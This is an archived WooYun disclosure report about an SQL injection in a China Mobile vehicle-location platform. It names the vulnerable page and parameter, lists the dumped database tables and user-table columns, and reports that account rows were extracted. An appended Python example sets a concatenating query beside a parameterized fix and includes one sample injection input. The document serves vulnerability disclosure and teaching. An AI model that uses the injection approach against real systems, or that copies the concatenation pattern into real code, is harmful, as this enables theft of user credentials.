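Vulnerability summary

Vulnerability ID: wooyun-2015-0139644

Vulnerability title: SQL injection vulnerability in the China Mobile Wireless City location application platform

Related vendor: China Mobile

Vulnerability author: qglfnt

Submitted: 2015-09-10 11:26

Fixed: 2015-10-26 14:04

Publicly disclosed: 2015-10-26 14:04

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 8

Vulnerability status: Handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]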

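Vulnerability details

Disclosure status:

2015-09-10: Details sent to the vendor; awaiting vendor handling
2015-09-11: CNCERT has not yet been able to reach the organization concerned; details disclosed only to the notifying agency
2015-09-21: Details disclosed to core white hats and experts in related fields
2015-10-01: Details disclosed to regular white hats
2015-10-11: Details disclosed to trainee white hats
2015-10-26: Details disclosed to the public

Brief description:

RT (as the title says)

Detailed description:

SQL injection: **.**.**.**/KnowladgeCenter/MsgView.aspx?id=5

Proof of vulnerability:

Current database

[Screenshot: 20150907232821.png]


All databases

[Screenshot: 20150907232910.png]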



Database: vms
[58 tables]
+----------------------+
| LocationHistorys |
| Locations |
| NewestLocations |
| Suppliers |
| Vehicle_admin_info |
| Vehicle_contact_info |
| VmsActiveVehicles |
| VmsApplyForms |
| VmsArea |
| VmsAreaApprove |
| VmsCompany |
| VmsDepartments |
| VmsDrivers |
| VmsFlowDefines |
| VmsFlowDetails |
| VmsFlows |
| VmsKnowledges |
| VmsMenus |
| VmsMobilePower |
| VmsMoblieMenu |
| VmsMonitorPower |
| VmsPoints |
| VmsProcessFlow |
| VmsProcessNode |
| VmsProcessTemplate |
| VmsRoads |
| VmsRoleInMenus |
| VmsRoles |
| VmsSystemConfig |
| VmsTasks |
| VmsUserInRoles |
| VmsUserSpecials |
| VmsUsers |
| VmsVehState |
| VmsVehicleTypes |
| VmsVehicles |
| VmsWatchs |
| accountToRole |
| account_info |
| baseStations |
| department |
| dispatch_info |
| employee_info |
| menu_info |
| repair_company |
| repair_cost |
| role_info |
| travel_cost |
| vehicle_DailyMlg |
| vehicle_accident |
| vehicle_change |
| vehicle_energy |
| vehicle_info |
| vehicle_items |
| vehicle_mil_logs |
| vehicle_mileage |
| vehicle_repair |
| vmsuserback |
+----------------------+


Columns

Database: vms
Table: VmsUsers
[12 columns]
+------------+---------+
| Column | Type |
+------------+---------+
| CmpId | int |
| vcId | int |
| VuDpId | int |
| VuEmail | varchar |
| VuId | int |
| VuName | varchar |
| VuPassword | varchar |
| VuPhone | varchar |
| VuPY | varchar |
| VuRemark | varchar |
| VuTrueName | varchar |
| VuVrId | int |
+------------+---------+


Account information

Database: vms
Table: VmsUsers
[69 entries]

Remediation:

Filter the parameters
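
Added example, not part of the original report: the fix stated above, sketched in Python against an in-memory SQLite table, with the concatenating pattern beside a validated and parameter-bound one. The `articles` table, its rows and all function names are constructed for illustration; on the ASP.NET page the same two steps would be integer parsing of `id` followed by a parameterized command.

```python
import sqlite3


def build_demo_db():
    """In-memory stand-in for the article table (constructed sample data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany(
        "INSERT INTO articles VALUES (?, ?)",
        [(5, "Fleet FAQ"), (6, "Internal draft")],
    )
    return db


def view_unsafe(db, raw_id):
    """Flawed pattern: the query-string value becomes part of the SQL text."""
    sql = "SELECT id, title FROM articles WHERE id = " + raw_id
    return db.execute(sql).fetchall()


def parse_id(raw_id):
    """Allow-list validation: ASCII digits only, bounded length."""
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        raise ValueError("id must be a positive integer")
    return int(raw_id)


def view_safe(db, raw_id):
    """Validate first, then bind the value as a parameter, never as SQL text."""
    article_id = parse_id(raw_id)
    sql = "SELECT id, title FROM articles WHERE id = ?"
    return db.execute(sql, (article_id,)).fetchall()


if __name__ == "__main__":
    db = build_demo_db()
    malformed = "5 OR 1=1"  # constructed input that is not a plain integer
    print("unsafe:", view_unsafe(db, malformed))  # condition rewritten, every row returned
    try:
        view_safe(db, malformed)
    except ValueError as exc:
        print("safe: rejected,", exc)
    print("safe:", view_safe(db, "5"))
```

Validation alone is the weaker half of the fix: binding the value is what keeps it out of the SQL grammar, so both steps belong in the handler.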

Copyright notice: when reposting, please credit the source qglfnt@WooYun


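Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-09-11 14:03

Vendor reply:

CNVD confirmed and reproduced the situation described and has passed it to CNCERT to notify China Mobile Group, which will coordinate follow-up handling with the website's administrators.

Latest status:

None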